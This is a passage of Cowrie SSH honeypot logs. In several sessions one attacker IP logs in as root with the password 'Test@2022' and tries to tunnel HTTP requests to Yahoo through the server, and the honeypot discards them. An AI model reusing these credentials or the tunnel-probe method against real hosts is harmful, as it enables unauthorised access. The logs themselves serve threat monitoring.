tr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.498070Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.780814Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":30052,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30052","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.838601Z","session":"dd93ab1b0789"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:05.895551Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":15910,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15910","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.051156Z","session":"dd93ab1b0789"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.108346Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.165690Z","src_ip":"213.209.150.239","session":"dd93ab1b0789"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29845,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1a94b961a5","protocol":"ssh","message":"New connection: 213.209.150.239:29845 (1.2.3.4:22) [session: fa1a94b961a5]","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.221446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.222292Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.278849Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.561356Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4583,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4583","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.619004Z","session":"fa1a94b961a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.675750Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31863,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31863","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.831040Z","session":"fa1a94b961a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.887699Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:06.945175Z","src_ip":"213.209.150.239","session":"fa1a94b961a5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29899,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ad407dc760f","protocol":"ssh","message":"New connection: 213.209.150.239:29899 (1.2.3.4:22) [session: 9ad407dc760f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.001401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.002578Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.060031Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.342154Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":27427,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27427","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.399864Z","session":"9ad407dc760f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.456746Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":28721,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28721","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.611008Z","session":"9ad407dc760f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.668386Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.726501Z","src_ip":"213.209.150.239","session":"9ad407dc760f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29965,"dst_ip":"1.2.3.4","dst_port":22,"session":"56b1a483629d","protocol":"ssh","message":"New connection: 213.209.150.239:29965 (1.2.3.4:22) [session: 56b1a483629d]","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.781913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.783050Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:07.840579Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.123297Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24402,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24402","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.181300Z","session":"56b1a483629d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.239408Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29318,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29318","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.394946Z","session":"56b1a483629d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.451599Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.509157Z","src_ip":"213.209.150.239","session":"56b1a483629d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30005,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e87d43f22a5","protocol":"ssh","message":"New connection: 213.209.150.239:30005 (1.2.3.4:22) [session: 9e87d43f22a5]","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.555457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.556608Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.603769Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.839842Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":25416,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:25416","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.887955Z","session":"9e87d43f22a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:08.935258Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":512,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:512","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.069640Z","session":"9e87d43f22a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.116770Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.164807Z","src_ip":"213.209.150.239","session":"9e87d43f22a5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30061,"dst_ip":"1.2.3.4","dst_port":22,"session":"cda8af414dfd","protocol":"ssh","message":"New connection: 213.209.150.239:30061 (1.2.3.4:22) [session: cda8af414dfd]","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.220420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.221509Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.277954Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.560818Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26116,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26116","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.618365Z","session":"cda8af414dfd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.675211Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25271,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25271","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.831142Z","session":"cda8af414dfd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.887787Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:09.945355Z","src_ip":"213.209.150.239","session":"cda8af414dfd"}
